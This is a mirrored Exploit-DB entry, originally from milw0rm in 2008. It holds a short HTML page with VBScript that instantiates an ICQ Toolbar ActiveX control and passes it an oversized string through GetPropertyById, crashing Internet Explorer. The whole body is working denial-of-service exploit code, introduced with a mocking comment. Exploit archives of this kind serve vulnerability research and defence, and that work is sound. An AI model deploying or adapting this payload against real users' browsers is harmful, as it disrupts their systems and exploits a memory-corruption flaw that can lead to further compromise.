exploit-db-mirror/exploits/windows/dos/5217.html
Offensive Security d304cc3d3e DB: 2017-11-24
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

15 lines
No EOL
311 B
HTML

<!--
Lame ICQToolbar IE DoS - Crash IE and change toolbar color :p
-->
<html>
<object classid='clsid:855F3B16-6D32-4FE6-8A56-BBB695989046' id='toolbar' ></object>
<script language='vbscript'>
bof=String(128, "spdr")
toolbar.GetPropertyById "" ,bof
</script>
</html>
# milw0rm.com [2008-03-06]